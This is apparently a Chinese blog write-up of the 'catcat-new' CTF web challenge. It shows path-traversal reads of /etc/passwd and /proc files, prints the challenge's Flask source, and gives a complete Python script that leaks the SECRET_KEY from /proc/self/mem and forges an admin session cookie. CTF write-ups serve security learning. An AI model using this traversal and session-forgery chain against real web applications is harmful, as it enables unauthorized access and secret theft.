攻防世界:catcat-new

已于 2023-10-24 09:02:27 修改
阅读量1.5k 收藏 6
点赞数 6
文章标签: 1024程序员节 网络安全
于 2023-10-24 09:02:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fightever_/article/details/134003106
版权

打开题目后发现没有文本输入框,F12后也没有在源代码中发现有效信息,只有上述四张图片内容能点进去

注意看URL栏,看来只能从URL下手了

先判断这个题目是不是关于任意文件读取漏洞,读一个Linux都有的文件/etc/passwd

http://61.147.171.105:60014/info?file=../../../../../etc/passwd

可以读取,这样看来这个题就是任意文件读取漏洞了

通过抓包发现Response中的Server是python,那说明该网站是有python运行的.既然是python,当前进程肯定是由python xxx.py启动的,只要能知道当时的命令是什么,就能获取xxx.py的名字,进而读取源码。linux确实有这么个文件,/proc/self/cmdline,用于获取当前启动进程的完整命令。

大部分的python网站脚本名都是app.py

在读取文件时一定要注意文件路径

这是源代码

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
 __name__,
 static_url_path='/', 
 static_folder='static' 
)
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh" #SECRET_KEY为uuid替换-为空后加上*abcdefgh。这里刻意的*abcdefgh是在提示我们secret key的格式
if os.path.isfile("/flag"):
 flag = cat("/flag")
 os.remove("/flag") #这里读取flag后删掉了flag,防止之前任意文件读取出非预期解

@app.route('/', methods=['GET'])
def index():
 detailtxt = os.listdir('./details/')
 cats_list = []
 for i in detailtxt:
 cats_list.append(i[:i.index('.')])
 
 return render_template("index.html", cats_list=cats_list, cat=cat)



@app.route('/info', methods=["GET", 'POST'])
def info():
 filename = "./details/" + request.args.get('file', "")
 start = request.args.get('start', "0")
 end = request.args.get('end', "0")
 name = request.args.get('file', "")[:request.args.get('file', "").index('.')]
 
 return render_template("detail.html", catname=name, info=cat(filename, start, end)) #cat是上面引用进来的函数
 


@app.route('/admin', methods=["GET"])
def admin_can_list_root():
 if session.get('admin') == 1: #session为admin就能得到flag,此处需要session伪造
 return flag
 else:
 session['admin'] = 0
 return "NoNoNo"



if __name__ == '__main__':
 app.run(host='0.0.0.0', debug=False, port=5637)

session伪造的必要条件是获取SECRET_KEY。python存储对象的位置在堆上。app是个Flask对象,而secret key在app.config[‘SECRET_KEY’],读取/proc/self/mem得到进程的内存内容,进而获取到SECRET_KEY。不过读/proc/self/mem前要注意,/proc/self/mem内容较多而且存在不可读写部分,直接读取会导致程序崩溃,因此需要搭配/proc/self/maps获取堆栈分布,结合maps的映射信息来确定读的偏移值.大佬读取/proc/self/maps+/proc/self/mem+SECRET_KEY的脚本,可一键获取flag.

import requests
import re
import ast, sys
from abc import ABC
from flask.sessions import SecureCookieSessionInterface

url = "http://61.147.171.105:60014/"

# 此程序只能运行于Python3以上
if sys.version_info[0] < 3:  # < 3.0
    raise Exception('Must be using at least Python 3')


# ----------------session 伪造,单独用也可以考虑这个库: https://github.com/noraj/flask-session-cookie-manager ----------------
class MockApp(object):
    def __init__(self, secret_key):
        self.secret_key = secret_key


class FSCM(ABC):
    def encode(secret_key, session_cookie_structure):
        # Encode a Flask session cookie
        try:
            app = MockApp(secret_key)

            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.dumps(session_cookie_structure)
        except Exception as e:
            return "[Encoding error] {}".format(e)
            raise e


# -------------------------------------------


# 由/proc/self/maps获取可读写的内存地址,再根据这些地址读取/proc/self/mem来获取secret key
s_key = ""
bypass = "../.."
# 请求file路由进行读取
map_list = requests.get(url + f"info?file={bypass}/proc/self/maps")
map_list = map_list.text.split("\\n")
for i in map_list:
    # 匹配指定格式的地址
    map_addr = re.match(r"([a-z0-9]+)-([a-z0-9]+) rw", i)
    if map_addr:
        start = int(map_addr.group(1), 16)
        end = int(map_addr.group(2), 16)
        print("Found rw addr:", start, "-", end)

        # 设置起始和结束位置并读取/proc/self/mem
        res = requests.get(f"{url}/info?file={bypass}/proc/self/mem&start={start}&end={end}")
        # 用到了之前特定的SECRET_KEY格式。如果发现*abcdefgh存在其中,说明成功泄露secretkey
        if "*abcdefgh" in res.text:
            # 正则匹配,本题secret key格式为32个小写字母或数字,再加上*abcdefgh
            secret_key = re.findall("[a-z0-9]{32}\*abcdefgh", res.text)
            if secret_key:
                print("Secret Key:", secret_key[0])
                s_key = secret_key[0]
                break

# 设置session中admin的值为1
data = '{"admin":1}'
# 伪造session
headers = {
    "Cookie": "session=" + FSCM.encode(s_key, data)
}
# 请求admin路由
try:
    flag = requests.get(url + "admin", headers=headers)
    print("Flag is", flag.text)
except:
    print("Something error")

最终得到flag:

catctf{Catch_the_c4t_HaHa}

青梅煮酒与君饮
关注
网络安全 | CTF】catcat-new
等风来
12-25 2392
读取了/proc/self/maps获得了应用运行的内存映射信息,接下来的思路就是:读取/proc/self/mem获得当前内存的详细信息,由于在app.py的info()方法从HTTP请求中接收了start和end参数,即可传参,从而读取任意文件中任意两个地址之间的数据,最后使用正则表达式匹配字符串\w+{\w+}直接获取flag
攻防世界-Cat
qq_44065556的博客
09-29 3680
进入环境出现的页面是一个输入框,然后让我们输入域名 我们顺着思路输入一个域名试一试 并没有任何的回显内容 想一想,如果输入127.0.0.1会怎么样? 它执行了一个ping命令,那么就会联想到会不会有命令拼接 在框中输入 127.0.0.1 & ls 127.0.0.1 | ls 显示无效的url,应该是被过滤掉了,burp抓一抓,跑一跑看看哪个字符没有被过滤 发现@符号没有被过滤,这有什么用呢,开始思考.没有特别好的思路,这个时候就要脑洞大一点,各种尝试了...
攻防世界-Web(catcat-new
m0_46225652的博客
11-03 434
攻防世界-Web(catcat-new
攻防世界-web题型-2星难度汇总-个人wp
最新发布
DamnVanish的博客
08-23 762
至此2星的靶场全部打完,个人认为catcat-new这道题最难,其次是supersqli,其它只要多花点时间和细节一点就可以
2024年网络安全最新CTF_WP-攻防世界web题解(1),2024年最新这原因我服了
2401_84264692的博客
05-07 1478
参考:https://www.cnblogs.com/gradyblog/p/16989750.html查看源码提示source.php并且还提到了一个hint.php,查看提示flag在这个里面先看前面的源码source.phprequest接收参数file,判断是否为空、是否是string、checkfile如果满足,则包含file否则打印滑稽所以应该是要把ffffllllaaaagggg文件包含进file,关键就是怎么绕过checkfile。
攻防世界 catcat-new
m0_73673698的博客
03-24 757
flask_session的伪造需要用到secret_key,而secret_key的值可以通过内存数据获取。在读取内存数据文件/proc/self/mem之前,我们要先读取/proc/self/maps文件获取可读内容的内存映射地址。file=../../../proc/self/maps,将maps文件返回的内容保存到test.txt中,用脚本去得到secret_key。记得要改一下url啊,不然只能像我这个笨比一样等半天(bushi),拿到secret_key之后我们去伪造session。
攻防世界catcat-new
2302_79800344的博客
04-05 1636
【代码】【攻防世界catcat-new
攻防世界catcat-new
qq_45955869的博客
05-28 1663
攻防世界catcat-new
攻防世界-WEB-catcat-new
m0_52061428的博客
06-29 1018
第一段我们确定了flag,第二段我们知道了/admin确实有做限制,只有当session获取admin=1时才能获取flag 又因为flask存在session可以被伪造的问题,所以我们接下来要做的就是伪造session从而获取flag
CTF之一天一题:攻防世界的web进阶之Cat
qq_42728977的博客
08-27 1600
这个题做的还是太明白,看了许多wp。在此小记录一下。 题目这个鸭子,看到以为是sql注入,但又看是输入域名,然后返回ping的结果,又像是命令执行漏洞,于是各种姿势试,无果。开始看wp。 大佬们是先fuzz一波,发现当url=@的时候报错,而@的的url编码是%80, ...
[CTF题目总结-web篇]攻防世界Cat
T2hunz1
01-10 4044
[CTF题目总结-web篇]攻防世界Cat
攻防世界】二十 --- Cat --- Django框架
qq_43168364的博客
12-29 1267
啊大大如哈的任何
【愚公系列】2023年05月 攻防世界-Web(catcat-new
热门推荐
时光隧道
05-26 1万+
任意文件读取漏洞是指攻击者通过在应用程序中输入非法的文件名或路径,从而获取未授权的文件读取权限的漏洞。攻击者可以利用此漏洞来读取系统文件、敏感数据或其他用户数据。这种漏洞通常是由于程序没有正确地检查用户的输入而引起的。建议开发人员在编写应用程序时进行严格的输入验证并使用安全的文件访问方法来避免此类漏洞的发生。
攻防世界-web-cat
mlws1900的博客
07-18 845
得知执行ping命令,用|,&&,||命令尝试,全部被绕过。看了其他人的wp,得知可以用@进行绕过,且为django开发。django的配置文件路径。搜索ctf,获得flag。试试127.0.0.1。显示如上图,一片空白。
攻防世界-misc】CatCatCat
weixin_73625393的博客
11-30 913
在查看txt文件时,可以看到在文件名命名的很有意思,然后通过搜索查看以后,发现有关于兔子的编码,关于猫的也有,但只是一个元素,在结合在kali中获取的密码,可以知道不是MD5,而是关于Rabbit算法加密解密。包含一张图片,一个txt文件,将图片复制到kali桌面上,使用strings命令查看该图片内容是否包含flag字符,得到的内容是密码为:catflag。得出来的数据,是由!组成符号,这三个符号组成的是Ook语言,将内容复制后,用下方网站解码。将解码出来的内容用base91解码,
攻防世界misc---CatCatCat详细版】
ncnfjdjjd的博客
01-22 2001
rabbit 加密,Ook!语言
[CTF-Misc攻防世界]CatCatCat
2302_76688540的博客
07-20 416
得到了一串大密码,我们不知道是什么,但是我们分析过91大概是base91,我们去试试看,我用随波逐流尝试了一下发现解开了。下面这个大概是最后一个猫猫的密码,但是我们分析之后发现这些里面cat是猫的意思,说明最后的密码和猫没有关系,我们再去分析。发现Rabbit密码需要密码才能解开,那我们去分析图片。我们从这三个下手,当然只是有可能是这三个是密码。那么我们的目标就明确了,找一个Ook!我们去看这个文件的名字。我们发现密码是catflag 我们去解密。归根到底只有这三类,应该是Ook!然后打开txt的内容是。
网络安全 CTF】catcat-new
2401_84970268的博客
05-13 1001
data = b’’try:except:start = 0end = 0# 检查文件是否存在并可读= 0:else:f.close()else:ifname# 解析命令行参数start = 0end = 0# 打印帮助信息exit()# 获取文件名参数# 获取起始位置参数# 获取结束位置参数= "":# 调用 cat 函数并打印结果else:其中= 0:用于读取start到end地址间的数据。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值